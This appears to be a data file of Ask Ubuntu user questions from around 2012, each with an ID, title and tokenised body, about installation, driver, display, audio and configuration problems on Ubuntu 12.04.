168154	installing gtk dev environment with aptitude	i 'm trying to install the gtk development environment on ubuntu , and having difficulty simply get it installed . basically , my goal is to simply compile a c file which includes the header file < gtk/gtk.h > , so i can start tinkering around : # include < gtk/gtk.h > int main ( ) { } so , this answer says you can simply apt-get install gnome-core-devel build-essential to get the development environment installed . okay , so i tried that and when i try to compile the above code , i get , the compiler complains it ca n't find the file gtk/gtk.h so , i add /usr/include/gtk-2.0/ to the path and compile again . now it complains that it ca n't find another file /gio/gio.h . this file did n't even exist on my system , so after googling around for gio.h , and apt-getting other libraries , i managed to install it . i tried compiling again , this time the compiler ca n't find /usr/include/glib-2.0/glib/gtypes.h . at this point , i 'm thinking it ca n't possibly be this difficult to simply install something like gtk development enviroment , which is a fairly popular package . i thought maybe something was wrong with my system , so i tried this on a different install of ubuntu , and ran into the same issues . so , what exact packages are necessary to install gtk ? and will i need to manually configure my include path , or is that supposed to happen automatically ?
168156	how to use a real partition with windows 7 installed , in a virtualbox vm ?	my ubuntu 12.04 install is on /dev/sda5 and windows 7 is on /dev/sda1 . when i am running ubuntu , i would like to use virtualbox to run windows 7 in a vm . the windows 7 partition is 1 tb and is half full , i.e . large , so i do n't want to copy it into a virtual hard disk . i have read that it is possible to use a real hard disk for a virtualbox vm , but the various instructions i have found differ from each other , and i ca n't seem to get it to work . does anyone know a way to make it work in ubuntu 12.04 and virtualbox 2.1.12_ubuntu r77245 ( the latest ubuntu installed the repos ) ? please post how it works for you as i want to retry any method that might work .
168158	how do i add more variants or custom packages to debootstrap ?	i have a set of packages that i wish to install along-side the minibase variant in debootstrap . i 'm having the hardest time figuring out how to customize variants so that more than just the base is installed in a chroot when debootstrap is run . any way to achieve this ?
168169	internet very slow on ubuntu , but not on windows	i have a 10mb of connection speed , on windows the download speed is around 1200kbps . but in ubuntu it is always around 150kbps , its very slow than expected . i tried to solve this by changing the server in software channels setting to best server , but this does not work for me . same speed on chrome downloads . i really hope that you guys can help me with this , because its really bad .
168170	mysterious crash with animated garbage on the screen	as shown in this video , my computer has been crashing lately . despite appearances to the contrary , it 's unresponsive . it does n't respond to keystrokes -- including the magic sysrq sequences , assuming i 've converted them properly to my keyboard configuration . sometimes it appears that the mouse will move , but i ca n't login via ssh . i 'm left to reboot by cycling the power , as i ca n't find any other way out . i 'm a teacher , and this machine usually lives in the staff room . sometimes , though , i carry it to my classroom for use in class . the crashes tend to happen more frequently upon moving my computer to my classroom , though it 's hard to say why . it does n't necessarily have anything to do with physical movement , but i 've only had one crash that did not take place in my classroom -- the first . my machine is a netbook -- an hp mini 110 running precise . perhaps also relevant is the fact that lots of programs seem to randomly crash on this machine for no apparent reason , particularly on login . any ideas ? edit : at the suggestion of jorge castro , i ran a memtest86+ check on my ram for about 2 hours and 15 minutes . it found no errors .
168171	no launcher or system tray	i think i have accidentally done something rather stupid . again . i ran compiz -- replace in a terminal , and i think i did something screwy to unity , because the bar at the top and the launcher is missing . i think i could live with it if : a . ) i knew how to open the home folder from the terminal ; and b . ) i knew how to open ccsm ( compiz config settings manager ) from the terminal ; but some repair for unity would be useful . i have tried sudo apt-get update & & sudo apt-get upgrade , and this : http : //www.tuxgarage.com/2011/04/missing-top-and-side-panels-in-unity.html , and nothing has worked .
168172	why are all the ccsm tick-boxes grayed out ?	i was editing my desktop and while editing it everything got hidden like top panel and left side panel . i restored it and it worked properly but i cant click on any tick button on the icons given on compizconfig settings manager . i dont even have an option to click or edit it . please help me out as soon as possible . i even tried reinstalling compiz , and purging it . this screenshot shows the problem ( click here to show it bigger ) : i can not click on any tick button ( i.e. , any checkbox ) near all these icons , while i can open and edit all these icons .
168173	screen brightness is either totally dim or totally max on a samsung np350 laptop	i updated my ubuntu 12.04 last night to the latest packages . when i tried to change brightness using fn key this morning , brightness went all the way to either min or max brightness . i was not able to set brightness to anywhere in between . i thought the update may have broken fn key , then i tried using the slide in brightness and lock screen in system settings . but when i have brightness and lock opened , brightness is locked to min brightness no matter i use the slide or fn key . p.s . i had no problem with brightness before yesterday . my hardware is samsung np350 laptop with intel hd3000 . thanks
168176	shadowgrounds/trine humble bundle does not work	i had a notebook with 1.6 atom processor and 2 gig ram that ran all the programs/games from the trine/shadowgrounds humble bundle without much of a problem . i now have a laptop with a 2.5 dual core and 8 gig ram ( both have/had integrated graphics cards ) and i now can not get these games to work . i see many posts about how they will not work with integrated graphics cards but considering not long ago i was running them on a crap notebook , i have a hard time understanding that . the games will flash open and slam shut as soon as i try to execute them , any help would be much appreciated .
168182	i can not close terminal after updating my pc	i am a complete novice with ubuntu . i have installed 12.04 and just run update from terminal . now can not exit terminal which appears every time i open my user account . i can use exit and ctrl+d to close the window but it just loops back to my password screen and once entered just goes back to screen with terminal open - showing computername/user jq : ~ $ then cursor . looked for help on previous questions but am really out of my depth ( drowning ) i have tried tab- > enter , ctrl- > shift- > w & ( q ) , ctrl+c , ctrl+z , jobs , bg and fg without any effect . can still operate under another user account but my `` primary '' account is in loop . has my update effort done something wrong ? would really appreciate any assistance . thanks for help . the terminal is on a black screen , sometimes full page and randomly a smaller box bu always with nothing else . i hope this is the correct way to answer queries .
168183	recent lcd trouble with 12.04 on 2010 macbook air 11 ( 3,1 )	i 've been using ubuntu 12.04 on my macbook air 3,1 ( 11 '' , late 2010 model ) and it 's been working well , after applying the post-installation patches found on the wiki . yesterday ( july 24 , 2012 ) , after doing an apt-get dist-upgrade , i noticed a glitch with the lcd screen : there is a vertical row of colored pixels that moves from top to bottom , with a marquee-like effect . i do not think this is a hardware problem , since it does not appear when i boot the computer into macos . the glitch is about 2 mm from the right edge of the screen , so it is not too noticeable ( there 's usually a scroll bar there ) , but i still would like to make it disappear . i did a brief google search for this problem but have n't found anything yet . can you suggest how i can investigate and hopefully fix this ?
168186	why is n't shutdown giving me a chance to save files in running programs ?	when i shutdown the computer , ubuntu just kills all the programs i have out and i was wondering if there was a way to change it so that it lets the programs ask if i want to save my document first or something along those lines ?
168190	lightdm.conf content erased , now stuck in low graphics mode	this evening i was attempting to disable the guest account and something went awry . currently on boot ubuntu enters low graphics mode . no specific error report . what did i do ? before this error occurred i added a line of code in lightdm.conf to disable the guest account . i think i may have accidentally erased the contents of lightdm.conf . not entirely sure . i troubleshooted for the past hour using various suggestions from other questions to no avail .
168191	where is my phpmyadmin installation ?	i just finished installing mysql-server , and then installed phpmyadmin which came with apache and php . it set it up alright and made a phpmyadmin database , but i ca n't seem to find the url to get to it -- i tried going to http : //my.server.ip/phpmyadmin but it does n't seem to be there . i ca n't find the location in any of the manuals , does anyone know where this is located ? thanks .
168195	how to remove ( purge ) opera ppa ?	i 'm completely as a loss as to how to get rid of all opera packages . i have ppa-purge installed , but do n't know what to specify for the ppa.. i have tried the following : sudo ppa-purge deb.opera.com sudo ppa-purge deb.opera.com/opera sudo ppa-purge deb.opera.com/opera stable sudo ppa-purge opera-list sudo ppa-purge -p http : //deb.opera.com/opera stable ..and many other combinations of the above , and all result in something like : warning : could not find package list for ppa : stable http : //deb.opera.com/opera/ this seems a lot harder than it could be to just uninstall ( and completely remove ) an application . ideally i 'd open the software center , remove opera and then it could ask me 'also remove the repository ? ' and then it 'd be gone .
168196	what usb wifi adapter can be used to watch streamed movies without disconnecting every 10 mins ?	i currently use a usb wifi adapter with chipset realtek rtl8192su . it works with no extra drivers to install in ubuntu 64 bit 11.04 . under a light load it works fine . but when trying to watch streamed movies , it stops every 10 minutes . i do n't have to reconnect , i have to just press play again to start the movie where it left off . in windows 7 it works fine . in a different laptop i 'm using the built in wifi with ubuntu 11.04 and no disconnects at all . i really think this adapter just does n't work as well in ubuntu . i would like to know what adapter you use that does n't freeze up on you consistently under a heavy load . please let me know if it was an easy install as well . thanks !
168197	brightness controls stopped working after update on a samsung qx412-s01au	previously on my samsung qx412-s01au laptop i had been able to get brightness controls working , see this question : brightness hotkeys only slightly work . after a recent automatic update , which upgraded the kernel , my brightness has stopped working and is on an almost unusably low setting . the keyboard shortcuts for brightness can adjust the screen between about 0 and 30 % . the slider using the keyboard shortcuts then ceases to move up , every button press just keeps the level at 30 % . `` brightness and lock '' in the settings allows you to move the slider the whole way , but never gives you more than the same 30 % brightness . here 's what i 've tried so far : echo `` 0 '' | sudo tee /sys/devices/pci0000:00/0000:00:01.0/0000:01:00.0/backlight/acpi_video0/brightness echo `` 7 '' | sudo tee /sys/devices/pci0000:00/0000:00:01.0/0000:01:00.0/backlight/acpi_video0/brightness these used to work , but now have no effect at all . xbacklight -set 100 this only allows you to change from about 0-30 , as above . i tried to re-apply this answer , but the acpi_backlight=vendor bit was still in my grub config . the output of ls /sys/class/backlight/*/brightness used to be this : used to be this : /sys/class/backlight/intel_backlight/brightness after the update is this : /sys/class/backlight/intel_backlight/brightness /sys/class/backlight/samsung/brightness the kernel version that came through in the update was linux-image-3.2.0-27-generic : amd64 ( 3.2.0-27.43 ) . edit- ( ian.b . ) just wanted to add that i have the same problem ( samsung qx411 , nvidia optimus ) and have removed the acpi_backlight=kernel from the grub and it does n't change anything . i also tried upgrading to a mainline 3.4 kernel with no effect ( with or without the acpi key in grub ) . interestingly if i cat the parameters in /sys/class/samsung/brightness/ with the power cord in/out i get : actual_brightness 8/1 bl_power 0 brightness 4/2 max_brightness 8 do n't know if it 's a clue that the brightness and actual brightness keys are n't in sync .
168202	`` failed to execute default file manager '' error when opening the trash folder	when i click on trash icon , i get this error message : '' failed to execute default file manager : failed to execute child process `` run '' ( no such file or directory ) . any help is appreciated .
168210	audio delays progressively when recording with ffmpeg	i am trying to record screencasts in ubuntu 12.04 , i have a working command , the audio sounds great and the video looks great . i have one issue though , the audio delays as the video goes on . at the beggining of the video the audio and video are synced together but as the video progresses the audio delay is bigger . i tried to record the video and audio streams separately , it seems at the end that the audio is 1 second longer than the video and that is for roughly 6 minutes of recording . if i record for 10 minutes the delay is of roughly 2 seconds . i have no possibility of fixing that issue in editing , simply because it is not a matter of consistent delay , but a progressively increasing one . i tried other screencasting apps , probably all of them and they either simply do n't work or they crash my computer ( kazam ) . is there a way to fix this issue ? thanks in advance for your response .
168213	what dab+ radio tuners work well with ubuntu ?	i currently have an fm tuner hooked up to my desktop that i use to listen to the radio . since my country is in the process of switching to the dab+ standard , i was wondering whether there are any similar devices available for the newer radio standard that are compatible with ubuntu . a usb tuner would be good , but a pcie or pci card would be acceptable too . it 'd be nice if the tuner provided access to the data services transmitted along with the audio ( e.g . the name of the current program/song ) , and access to the audio bitstream ( i.e . it does n't decode the audio internally and feed it to the line-in jack of the sound card ) .
168216	ubuntu 12.04 does not boot even with nomodeset	i am running ubuntu 12.04 on an amd athlon ii x2 240 w/ 3 gb ram and an ati radeon hd5670 . i 'm having the problem of sudden slowdowns , which i think may be due to the graphics driver . i 'm an ubuntu newbie and would love some basic instructions or explanations . i 've tried the fglrx driver and the driver from the ati website but they both produced slowdowns . and checking the details under system settings , it showed the vesa-redwood driver . so i tried purging the fglrx driver like on this link how do i restore default video drivers ? but then i ca n't see anything when ubuntu boots up , even with the nomodeset option , i was able to fix it before with the nomodeset but now nothing . i 'm confused with w/c driver i should really install , should i go with the fglrx or the ati driver , and what are open source drivers ? is there a way to remove all of these and start fresh ? a nice explanation or link to a guide explaning all of this stuff would be helpful . thanks a lot !
168218	will ubuntu point releases include a new linux kernel ?	now that kernel 3.6 has been officially released , i 'm wondering if the next ubuntu point release will include the new kernel ?
168220	when i run google chrome i get a strange message about alsa	when i run google-chrome from the command line i get this recurring message , and i also get performance hangs and i was wondering how i can fix it ... platform : ubuntu 12.04 lts kernel version 3.2.0-27-generic alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream
168226	is 12.04 compatible with the athlon xp-m processor ?	having tried on an off for several days on and off to install 12.04 unsuccessfully i today actually got a useful message during installation when it froze `` stopping cpu interrupts balancing daemon '' there the system froze . the processor is a 32 bit amd athlon xp-m in an asus laptop . looking at the versions of 12.04 available for download i notice that amd64 processors need different downloads to intel processors and have different checksums . need some expert advice here ? is 12.04 a non starter so far as my particular processor is concerned or will the amd64 ( which is presumably designed for a 64 bit work ? does anyone know ?
168227	i want to get rid of ubuntu 11.04 and get xubuntu 12.04 , but disk wo n't work ?	i have been using ubuntu 11.04 for quite some time know , but i 've noticed that my laptop was running slowly . so i decided to get a different operating system that was similar to ubuntu , so i ran into xubuntu which i 've heard was a bit better for older computer , but still was in the linix name . so what im asking for are some instructions on how to get rid of ubuntu and how to install xubuntu . thank you for any help . : )
168235	when is the next point release to be available ?	there are several things i love about 12.04 lts , but several bugs which make it terrible , like the lightdm issues with the xserver and whatnot . i 'm really hoping on the next point release to fix these annoying problems , but i want to know ... when is it expected to be released to the public ?
168246	why is n't persistence working on lubuntu 12.04 live-usb ?	i have used universal-usb-installer ever since to install different linux versions to usb flash drive . but now with lubuntu 12.04 even though i do the same process by selecting persistence file , it gets created but is never used in lubuntu . every time i boot into lubuntu on flash , it is fresh new lubuntu without my changes i did last time i have booted it . anyone can help me or give me some hints ? thanks in advance .
168253	installation problem with atom d2500 cedarview	i just got my netbook yesterday and spent the whole day to get ubuntu into it . intel atom d2500 , cedarview , 1.86 ghz , 2 gb ram . an error occurred when i tried to install both using wubi and iso . the error was `` ca n't retrieve required installation files '' and it prevented the installation process from completing . at one point , whenever i try to install , the installation seems finished and it seems like i just need to reboot . but it gets stuck on a black screen afterwards or stuck on commands kernel thread helper . it seems that the cedarview processor has something to do with the problem . has anyone had any experience with this issue or has any solution to it ? please let me know .
168256	multiple users , single workstation , 1 home folder ( can this be achieved , if so how ? )	i am setting up a single workstation ( kiosk ) in my local library for a team of genealogy researchers ( approx 12-14 ) . i plan to use ubuntu 12.04 lts as the os . each user must have a unique user id and password ideally , i would like each user to enter their user id manually . by default lightdm allows the user to select their name from a scrolling list . ( this is not a showstopper though ) all users must to access a single desktop environment and the same home directory for document collaboration ( single document repository for all users ) . i also want to avoid configuring the desktop ui look and feel as many times as the number of users . ** i have planned a branded desktop background , launcher layout and other things consistent with a training manual i am putting together . i need to audit log in logout date/time stamps for each user to capture time spent . the answer to this question helps me with this point . ( i will need to understand if the answer is still valid as it was written in 2010 . ) i am asking a very specify question ; is what i have described above holistaically achievable and if so how ? i will accept a `` no '' or `` probably not '' answer . if that is the case please help me understand with a brief `` why '' and i will go back to the drawing board . the reason for asking the question is that i suspect its not achievable but want to be 100 % sure .
168264	thunderbird date format ?	i have ubuntu 10.04 running thunderbird 14.0 how do i change the date format to international standard ? ( eg ; 2012-07-26 ) my system date already shows this format .
168265	how do i disable or change the `` alt+` `` shortcut to switch between multiple windows of a single application ?	on ubuntu 12.04 , how do i disable or change the alt+` shortcut which lets you switch between multiple windows of a single application ? ( see below for terminal example ) my windows vm in korean needs to use that keyboard combination to switch character sets .
168266	python gtk 3 ide	just a quick question , to check if there are any available ide for python gtk 3 . ie : an ide which give the programmer an auto complete feature with method description etc .
168273	computer auto reboots after some time	when i try to install ubuntu 12.04 on my laptop , it just reboots . i tried with cd , with usb stick , everytime i choose install after 15 seconds it just restarts . if i install it via windows with wubi it works fine . i installed an old ubuntu version and it worked and then upgraded it to 12.04 . i managed to update but it only works ( kind of ) with kernel 2.6.31-14 . if i use kernel 3.2.0-26 , it just reboots when you try to load it . my laptop has 4 gb ram and an intel dual core processor and a nvidia 9200gs 256 mb video card . the board chipset is via .
168275	acer aspire 4349 backlight unable to dim , slider moves only with no effect , non-bios controlled	acer aspire 4349 backlight unable to dim , slider moves only with no effect , non-bios controlled , how-to configure software to actually dim the sucker rather than just moving a slider-indicator ? tried suggestion found by using cairo dock and `` luminosity '' , but it 's not the real deal , ( not looking for a mere gamma adjustment ) , although this `` gama adjustment '' works ( looks like shyt , though ) , i 'm looking for an actual effective led back-light controller . i think i made a mistake buying an acer , sticking with msi , for rats sake , at least , their backlight is controlled directly through the bios ! what kind of crap controls this backlight with `` software '' ... hell , just 2 led indicators that work `` weirdly '' , only thing i like 'bout this acer is surprisingly the celeron b815 . not a damned thing else !
168279	how do i build a single in-tree kernel module ?	the linux-source- ... has a module which is disabled in the config /boot/config-3.4-trunk-686-pae so that it is not part of linux-image- ... ( this is on debian , but the solution should be the same for ubuntu , or ? ) , e.g . # config_can_peak_usb is not set how would one compile just that kernel module , so that it can be used with the distributed kernel ? the respective linux-source- ... package is already installed , uncompressed and linked to /usr/src/linux . /boot/config-3.4-trunk-686-pae is copied to /usr/src/linux/.config and modified with config_can_peak_usb=m with make make modules it is possible to compile the kernel and all modules . but how would one compile only that specific single module ? ( note : also the kernel needs to be compiled before , otherwise you get the following error : no symbol version for module_layout )
168280	how do i grant sudo privileges to an existing user ?	i want to grant a newly created user sudo privileges in ubuntu . i tried sudo adduser hduser admin but it says no admin group exists . how can i do it ?
168286	where to find bugs fixed in point releases or addressed to be fixed in ubuntu 12.04.1 lts ?	since according to this release schedule the 12.04.1 point release is expected on 23 august 2012 . as per the point release wiki in release minus 1 month that all candidate bugs are fixed . where to find the list of bugs that will be targeted to be fixed or fixed . or changelogs as here ( not up-to-date i guess for pr ) p.s . : i guess it is too early to ask this question , if it is comment so .
168288	how to open pcb file	as some of you know , .pcb is application dependent . i have an .pcb file which is prepared on protel . i want open this pcb file in ubuntu 12.04 via using geda or other applications . however , i could not manage it . how can i see or convert this file in ubuntu 12.04 ? note : i have used : eagle fritzing geda kicad however , they could not manage to open it .
168290	why ca n't mount read files in `` /etc/fstab.d/ '' ?	i 'm trying to setup an automatically mounted volume , and noticed that there is now an /etc/fstab.d/ on my server . i created a new file in the directory with the following contents : # backupstore : large volume /dev/mapper/bagend-backupstore /mnt/backupstore ext4 auto , relatime , users , sync 0 0 but when i run mount -a the volume is not mounted . also , when i run mount /mnt/backupstore or /dev/mapper/bagend-backupstore i get told that the system could n't find the entry in fstab ( and to pre-empt : yes , the device and mount-point are correct - i can easily mount this with mount -t ext4 /dev/mapper/bagend-backupstore /mnt/backupstore ) when i delete the file from /etc/fstab.d/ and put the entry into the main /etc/fstab file , i have no problems mounting the volume . so , can the mount command be made to check for entries in /etc/fstab.d/ and if yes , what do i do to make it happen ?
168295	banshee will not import media since 12.04 upgrade	installed ubuntu 12.04 on my amd64 desktop which has been happily importing media from my ipod 5th gen into banshee with no problem all year . after installing 12.04 all banshee does is remember ipod files and seems to treat it as a drive to play media from , but not import media to pc . if i click on import all that happens is that the file names get imported with their location on the ipod but no actual files get transferred as used to happen . is there a fix for this is should i just wait for a program update ?
168300	edit ftp file via ubuntu terminal ?	i 'm connecting my website via $ ftp command . i want to edit some files via nano or gedit.but when i enter nano filename.php bash returns ? invalid command . how can i edit files via using ubuntu terminal ?
168303	ubuntu 12.04 slow graphics	i 've been having slowdowns in ubuntu since upgrading to 12.04 , sometimes even freezing and crashing my pc . i 'm using an amd athlon ii x2 with 3 gb ram , and an ati radeon hd 5670 . i 've already installed the ati drivers from their website but i 'm not sure if it uses the driver . from system settings > details , it shows up as vesa - redwood . update : here are the results of running 'glxinfo ' and 'fglrxinfo' $ glxinfo server glx vendor string : ati server glx version string : 1.4 $ fglrxinfo opengl vendor string : advanced micro devices , inc. opengl renderer string : ati radeon hd 5670 so , i suppose i have the ati driver ? but it still freezes or slows down occasionally , is anyone also experiencing this on ubuntu 12.04 with ati graphic cards ? thanks !
168307	screen resolution messed up after wakeup	yesterday i suspended my computer when i left work . this morning i turned it on and the resolution was messed up . at first i could only get it to work in 640x480 and all text was unreadable . since then i have managed to get it to 1280x1024 but nothing beyond that and certainly no second monitor . i have a dell precision m4600 . it has an nvidia quadro 1000m graphics card . it seems that at the very least my xorg.conf was messed up by something as it was empty . i suspect an update but i did n't pay much attention to what updates were installed yesterday so i ca n't be sure . i have tried ( almost but not exactly in order ) : restoring xorg.conf from some backed up versions ... unfortunately these were incorrect as well which is probably why they were n't active in the first place . did n't work anyway . running nvidia-config removing all nvidia drivers running dpkg -reconfigure xserver-xorg reinstalling latest nvidia drivers removing xorg.conf entirely and probably some permutation of all the above steps combined with multiple reboots and repressing the urge to smash my laptop against the wall give up on technology and move to a sandy beach in the mediteranean area . ok , maybe i am slightly frustrated . i understand there are a lot of problems with nvidia drivers and the latest ubuntu . nothign i do seems to convince it there even are nvidia drivers installed . i have n't found an answer in other threads but it is a bit difficult searching when resolution is less than ideal . if there is answer in another thread please point me there . otherwise please prove you brilliance ( or my stupidity ) by giving the magic one liner which solves all my problems . please ?
168310	why do i get more free space than ext4 after formatting in xfs ?	i 've bought a 1tb external hard drive and after formatting the entire drive in ext4 nautilus says there are 934.3 gb of free space . i 've also tested formatting the drive in xfs , and in this case there are 999.7 gb of free space . why more than 60 gb are missing from free space with ext4 and not with xfs ?
168322	$ path from /etc/environment overwritten	i 'm upgrading a bunch of installations of 10.04 to 12.04 . in 10.04 i used to define system wide env . variables in /etc/environment . it works , but not for $ path that seems to be overwirtten . i do n't want to define it in /etc/bash.bashrc nor /etc/profile because i want all desktop apps can see its value properly , not only the terminal . anybody knows where could $ path get overwritten ? if i log in via tty the path has the value i indicated in /etc/environment but if i log into x the path has the value /usr/local/bin : /usr/bin : /bin : /usr/games any help will be appreciated .
168329	groups : can not find name for group id 125	i 've recently uninstalled virtualbox and since then , everytime i open a terminal i get the following : groups : can not find name for group id 125 the output of /etc/group is here : http : //pastebin.com/gysgphra i did n't want to paste the full output here , it 's a bit long . strangely enough , there is no group 125 but as far as i remember that was assigned to the vboxusers group . google has not been helpful at all . i see a similar question here : can not find name for group id 127 but i do n't know what he 's talking about here : but i 've found it in the group- list entry vboxusers : x:127 : peter can anyone point me the right direction ?
168330	error when atempting to install ubuntu 12.04	attemping a new install of ubuntu 12.04 on what was a windows xp laptop ( hp pavilon ze4500 with 40gb hdd ) . downloaded the iso image and burned to a dvd . seems to copy all files ok , askes for location and keyboard and after a while reports installation failed , the installer encountered an unrecoverable error . a desktop session will now be run so that you may investigate the problem or try installing again . i am completly new to linux and have little technical knowledge so simple advice as how to proceed will be welcome . thank you . follows one example of an attempt to install . install ubuntu tick for 4.4 gb available , is connected to the internet , other 2 option not ticked this time option 1 install ubuntu 12.04 lts alongside install ubuntu 12.04 lts - not selected erase ubuntu 12.04 lts and reinstall - not taken something else - selected /dev/sda /dev/sda1 ext4 39000 mb with 2909 mb used /dev/sda swap 1004 mb with 0 mb used new partition table you have selected an entire devices to partition ... all current partitions will be removed - can be undone if wished now shows /dev/sda free space 40007mb selected add . create a new partition primary or logical - took default of primary new partition size changed from 40007 mb to 39000 mb location for new partition - took default of beginning ( rather than end ) use as ext4journaling file system ( do n't understand the choices anyway ) set mount point with / ( found this on the internet otherwise would have never known what to put into here ) now shows /dev/sda /dev/sda ext 4 / tick under format ? , size 38998 mb type unknown free space 1008 mb - changed the type to swap install now after some time the install fails the installer encountered a unrecoverable error . a desktop session will not be run so that you may investigate the problem or try installing again finally system program problem detected
168332	ubuntu 12.04lts 64bit wireless problem - broadcom bcm4306	i 've recently updated from the 32bit version of ubuntu to the 64bit , ( just built a new computer , woot ) and since then , my wireless internet has been failing . my card is a broadcom bcm4306 rev 2 , 14e4 is 4320 . i 've always had some trouble with my wireless card , and i 've had to follow the ubuntu wiki to get it working , but it has always worked . bear in mind that was with a 32bit install . now i 've switched to 64 , nothing works . i 've tried b43-fwcutter , b43legacy , b43 , everything , and still nothing works ! another thing : i just ran lspci -vnn -d 14e4 : and was surprised to see this : 04:06.0 network controller [ 0280 ] : broadcom corporation bcm4306 802.11b/g wireless lan controller [ 14e4:4320 ] ( rev 02 ) subsystem : askey computer corp. emachines m6805 802.11g built-in wireless [ 144f:7050 ] flags : bus master , fast devsel , latency 32 , irq 20 memory at fddfe000 ( 32-bit , non-prefetchable ) [ size=8k ] capabilities : < access denied > kernel driver in use : b43-pci-bridge kernel modules : ssb does that 32bit line have anything to do with it ? i really need a hand setting this up , and i can supply any additional information as asked . thanks ! tl ; dr : i need help setting up a broadcom bcm4306 rev2 on ubuntu 12.04 64-bit .
168333	routing sound from different cards to a single output	i have a setup where i am monitoring for silence on an incoming stream on 3 different audio cards . when i detect silence on the master i switch to the secondary , and if i detect silence there i switch to the last card . the way i have it set up i load/unload the loopback module for each card depending on who 's the active card . this has the inconvenience that i need a 3-to-1 minijack cable to be able to maintain the stream . can i load the loopback module and point the output to a single card ( independently of the input card ) ? how can i route the audio from any input to a single output ?
168336	why have there been no 12.04 powerpc updates for weeks - as of 26 july 2012 ?	it seems powerpc port 12.04 updates have stopped . there have been none for some time but there is plenty going on in intel land . there are proposed updates for today - 26 july 2012 - is there a problem ?
168337	why is ubuntu , or any os for that matter , giving me a blank syslinux screen ? ( usb )	i 'm getting a syslinux screen upon boot from usb , is there any way to avoid this ? it 's happening for any os that i 'm trying to install . the exact message is : syslinux 4.03 2010-10-22 edd copyright ( c ) 1994-2010 h. peter anvin et al i 've researched this and every response i 've found has been tried with no success . i 'd love if someone could help me out , thanks .
168340	gnome shell google calendar does n't want to run on startup	i installed gnome shell google calendar according to these instructions : http : //www.webupd8.org/2011/09/google-calendar-gnome-shell-integration.html i also added gnome-shell-google-calendar.py to the startup applications . however the script does n't want to run on startup and i have to manually run it each time i restart ubuntu . any ideas why it is n't working ?
168346	ubuntu does n't work - wubildr issue ( and can i make my pc bootable without smartbootmanager which does n't work )	i just installed ubuntu using the .exe installer . i tried 3 times before with a cd , but it did n't boot ( whatever ) . when i turn on the laptop , and select ubuntu , i get an error or something ( it disappears too fast for me to read it , i just noticed a word `` error '' in it ) . then the screen becomes black and nothing happens . then i shut down the laptop using the power button . please help i want to have ubuntu on my laptop without uninstalling windows or reformatting . edit : i tried reinstalling and i got error again . this time i noticed more things : non-ms , skip error prefix did hp blocked ubuntu or something ? some more info : i only ran wubi.exe and changed install size to 20gb and clicked install or whatever the button was . it finished in some time then it wanted to restart the computer . i clicked restart now . and when the computer turned off , it turned back on and i got that error again . so reinstalling did n't help . i think hp blocked it ( i have hp pavilion g7 1303 ) . i 'm not sure but i think `` non-ms , skip '' was a part of that error . ( first line ) edit : i think i got the whole error non-ms ; skip no wubildr error ; prefix and can i make my hp pavilion g7 1303 bootable and how ?
168351	where can i find the ubuntu webapps source code ?	this article mentions the following : ubuntu webapps runs only on the unity desktop interface , and its code will be available as open source on the canonical launchpad project management service . the article also mentions that webapps is a `` plugin for the firefox browser '' . where can i find its source ?
168352	how do i generate a package download list ?	i want to generate a package download list , which can be used to download those packages from another system . ( i have a slow connection ) . i want to use those downloaded files to create a local repository from which i can install/upgrade my system . how can i achieve this ?
